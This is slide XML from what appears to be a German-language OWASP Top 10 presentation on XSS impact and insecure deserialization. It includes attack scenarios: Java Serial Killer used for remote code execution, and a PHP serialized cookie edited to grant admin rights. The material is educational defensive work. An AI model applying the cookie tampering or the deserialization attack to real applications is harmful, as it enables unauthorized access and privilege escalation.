                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Datenerhebung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> die zweithäufigste Schwachstelle in der OWASP Top 10. Sie findet sich in etwa zweidrittel aller Anwendungen. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automatisierte Tools können einige XSS-Schwachstellen automatisch finden. Das gilt insbesondere für ausgereifte Technologien wie PHP, J2EE / JSP und ASP.NET.</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de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Der Schaden durch XSS ist mittel für reflektiertes und DOM-basiertes XSS und schwerwiegend für persistentes XSS. Es kann zu Remote-Code-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> im Browser des Opfers führen, beispielsweise für den Diebstahl von Zugangsdaten, Sessions oder zur Verbreitung von Schadsoftware beim Opfer. </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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verwundbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendungen oder APIs können verwundbar sein, wenn Sie bösartige oder vom Angreifer manipulierte Objekte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialisieren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dies kann zu zwei Hauptangriffsarten führen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>Angriffe mittels Objekt- und Datenstrukturen, die es Angreifern ermöglichen, die Anwendungslogik zu verändern oder Programmcode auszuführen. Dies ist möglich, sofern die Anwendung auf Klassen zugreifen kann (inkl. Standard-klassen), deren Verhalten während oder nach der Deserialisierung manipuliert werden kann.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>Übliche Angriffe mittels Datenmanipulation: dazu zählen Angriffe gegen die Zugriffskontrolle, wobei existierende Datenstrukturen genutzt und deren Inhalt manipuliert werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serialisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> wird häufig eingesetzt bei:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>Remote- und Inter-Prozess Kommunikation (RPC/IPC) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Protokollen, Webservices, Message-Brokern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>Caching/Persistenz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>Datenbanken, Cache-Servern, Dateisystemen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>HTTP-Cookies, HTML-Formular-Parameter oder API- Authentifizierungs-Token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mögliche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angriffsszenarien</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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> basierte Anwendung nutzt einige Spring Boot-Microservices. Die Programmierer dieser funktionalen Sprache haben darauf geachtet, dass ihr Programmcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>„unveränderbar“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ist. Daher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serialisieren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Sie den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Benutzerstatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und transferieren diesen so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jeder Anfrage hin und her. Ein Angreifer entdeckt die „rO0“-Base64-Signatur des Java-Objekts und nutzt das Werkzeug Java Serial Killer, um Remote-Code-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> auf dem Anwendungsserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> auszuführen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ein PHP Forum nutzt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>die PHP-Objekt-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serialisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> um ein „Super-Cookie“ zu erzeugen, dieses enthält Angaben zur User-ID, Rolle, einen Passwort-Hash und weitere Informationen:</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a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">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a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ein Angreifer verändert nun das </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serialisierte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Objekt, um sich selbst Admin-Rechte zu verschaffen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Cheat Sheet: Deserialization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Validate All Inputs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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecEU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2016: Surviving the Java Deserialization Apocalypse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hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId10"/>
